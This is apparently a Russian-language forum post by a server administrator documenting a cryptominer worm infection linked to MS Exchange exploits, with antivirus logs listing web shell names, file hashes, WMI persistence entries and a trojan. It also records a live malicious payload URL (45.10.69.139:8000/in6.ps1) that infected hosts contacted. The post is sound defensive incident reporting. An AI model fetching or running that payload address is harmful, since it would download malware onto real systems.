[I]Хеш SHA256 файла: e3614efab364abe01dd98d92e61d6a73decc9ad87e9d6ce14059581e4ca4ccc2[/I]
[I]Обнаружен возможно зараженный объект: Троянская программа HEUR:Exploit.Script.CVE-2021-26855.gen.[/I]
[I]Имя объекта: log.aspx [/I]
[I]MD5 хеш файла: f0520236bf9c8c73f199a244d029a49f[/I]
[I]Хеш SHA256 файла: 264f9bf852f2c00eb804050861da39b78c1720dc5f77e08dc484dde0a85430eb[/I]
[I]Обнаружен возможно зараженный объект: Троянская программа HEUR:Exploit.Script.CVE-2021-26855.gen.[/I]
[I]Имя объекта: RXT7WB.aspx [/I]
[I]MD5 хеш файла: c2b67fb32ef0953722ea437295be386b[/I]
[I]Хеш SHA256 файла: b4d02ac0e79ca6376416f52c30a82d8b72efcb8966640f3dbf5b22f67e6075b9[/I]
[I]Обнаружен возможно зараженный объект: Троянская программа HEUR:Exploit.Script.CVE-2021-26855.gen.[/I]
[I]Имя объекта: dgFfuh.aspx [/I]
[I]MD5 хеш файла: 0418b10fdf926066fa6a19e83332e34e[/I]
[I]Хеш SHA256 файла: 59720c4ae289ab2a8336a1cd24fbfb2a24478e1ed88d517725999751e510b97a[/I]
[I]Обнаружен возможно зараженный объект: Троянская программа HEUR:Exploit.Script.CVE-2021-26855.gen.[/I]
[I]Имя объекта: 7r3q2.aspx [/I]
[I]MD5 хеш файла: dbb0576553870e07f8220386b5989cdb[/I]
[I]Хеш SHA256 файла: 6377ada51e66550bafda31038897ed13be71f928dabbefd657a1d3b8be672237[/I]
[I]Обнаружен возможно зараженный объект: Троянская программа HEUR:Exploit.Script.CVE-2021-26855.gen.[/I]
[I]Имя объекта: log.aspx [/I]
[I]MD5 хеш файла: f0520236bf9c8c73f199a244d029a49f[/I]
[I]Хеш SHA256 файла: 264f9bf852f2c00eb804050861da39b78c1720dc5f77e08dc484dde0a85430eb[/I]
[B]5. Дополнительная информация: ссылки на статьи по теме, логи детектов вирусной активности с зараженных машин[/B]
Злоумышленники активно эксплуатируют уязвимости в MS Exchange
[URL=https://www.kaspersky.ru/blog/exchange-vulnerabilities/30228/]https://www.kaspersky.ru/blog/exchange-vulnerabilities/30228/[/URL]
Handling a distributed cryptominer AD worm
[URL=https://www.certego.net/en/news/handling-a-destributed-cryptominer-ad-worm/]https://www.certego.net/en/news/handling-a-destributed-cryptominer-ad-worm/[/URL]
Далее привожу примеры из журналов безопасности антивирусов в качестве дополнительной информации и для индексации поисковых систем, т.к. в процессе поиска причин и вариантов решения я внятного алгоритма решения не нашел. Возможно найденные варианты решения окажутся полезными кому-нибудь еще.
Если на зараженной машине, на которой не стоит антивирус, запустить DrWeb CureIT, то обнаруживаются обычно следующие угрозы (пример с конкретной машины):
[I]Объект: powershell.exe[/I]
[I]Угроза: PowerShellDownLoader.1452[/I]
[I]Путь: \Process\4288\Device\HarddiskVolume2\Windows\System32\WindowsPoweShell\v1.0\powershell.exe[/I]
[I]Объект: CommandLineTemplate[/I]
[I]Угроза: PowerShellMulDrop.129[/I]
[I]Путь: \WMI\root\subscription\CommandLineEventConsumer{266c72e5-62e8-11d1-ad89-00c04fd8fdff}\CommandLineTemplate[/I]
powershell.exe может быть несколько, CommandLineTemplate обычно один.
После пролечивания утилитой DrWeb CureIT "паразитные" процессы исчезают, но через какое-то время снова происходит заражение и последующая загрузка мощностей машины.
В рамках борьбы с заражением на сервера установлены Каspersky Security for Windows Server 11.0.1.897
После установки, активации, обновления баз и включения KSN запускалась "Проверка важных областей" с настройками "по умолчанию" (Действия над зараженными и другими обнаруженными объектами: Выполнять рекомендуемое действие).
Находилось следующее:
[I]Обнаружен объект: Потенциальная уязвимость HEUR:Trojan.Multi.GenAutorunSvc.ksws.[/I]
[I]Имя объекта: WMIService:BVMFJGIVCEOAWSUOYQTH [/I]
После последующей перезагрузки сервера в диспетчере задач всё выглядит прилично и "лишние" процессы не грузят систему.
Но в "Событиях" задачи "Постоянная защита файлов" постоянно появляются блоки новых записей с пометкой "Уровень важности: Критический".
Блок сообщений с одного из серверов:
[I]Время: 26.08.2021 2:06:54[/I]
[I]Обнаружен объект: Потенциальная уязвимость HEUR:Trojan.Multi.GenAutorunWmi.ksws.[/I]
[I]Имя объекта: WMI-Consumer:SCM Event8 Log Consumer [/I]
[I]Время: 26.08.2021 2:06:55[/I]
[I]Обнаружен объект: Потенциальная уязвимость HEUR:Trojan.Multi.GenAutorunWmi.ksws.[/I]
[I]Имя объекта: WMI-Consumer:SCM Event8 Log Consumer2 [/I]
[I]Время: 26.08.2021 2:50:51[/I]
[I]Обнаружен веб-адрес. .[/I]
[I]Имя объекта: [/I][URL=http://45.10.69.139:8000/in6.ps1][I]http://45.10.69.139:8000/in6.ps1[/I][/URL]
[I]Компьютер: network[/I]
[I]Пользователь: KR-TERM\Администратор[/I]
[I]Имя процесса: wmiprvse.exe[/I]
[I]Время: 26.08.2021 6:55:28[/I]
[I]Обнаружен веб-адрес. .[/I]
[I]Имя объекта: [/I][URL=http://45.10.69.139:8000/in6.ps1][I]http://45.10.69.139:8000/in6.ps1[/I][/URL][I] [/I]
[I]Компьютер: network[/I]
[I]Пользователь: KR-TERM\Администратор[/I]
[I]Имя процесса: wmiprvse.exe[/I]
На других серверах дополнительно появлялись сообщения с другими пользователями и процессом:
[I]Обнаружен веб-адрес. .[/I]
[I]Имя объекта: [/I][URL=http://45.10.69.139:8000/in6.ps1][I]http://45.10.69.139:8000/in6.ps1[/I][/URL]
[I]Компьютер: localhost[/I]
[I]Пользователь: WORKGROUP\FIL-T2$[/I]
[I]Имя процесса: services.exe[/I]
[I]Процесс терминирован: обнаружена попытка эксплуатации уязвимости. Причина: в защищаемом процессе другой процесс создал поток управления.[/I]
[I]Имя объекта: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe[/I]
[I]Компьютер: VIRTUALMACHINE[/I]
[I]Пользователь: VIRTUALMACHINE\Администратор[/I]
[I]Имя процесса: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe[/I]
[I]Обнаружен объект: Троянская программа Trojan.Win32.Shelma.arzd.[/I]
[I]Имя объекта: C:\Windows\System32\mue.exe [/I]
[I]MD5 хеш файла: d1aed5a1726d278d521d320d082c3e1e[/I]
[I]Хеш SHA256 файла: 0a1cdc92bbb77c897723f21a376213480fd3484e45bda05aa5958e84a7c2edff[/I]
[I]Компьютер: network[/I]
[I]Пользователь: VIRTUALMACHINE\Администратор[/I]
Изменено: Mr Burila - 04.09.2021 15:15:24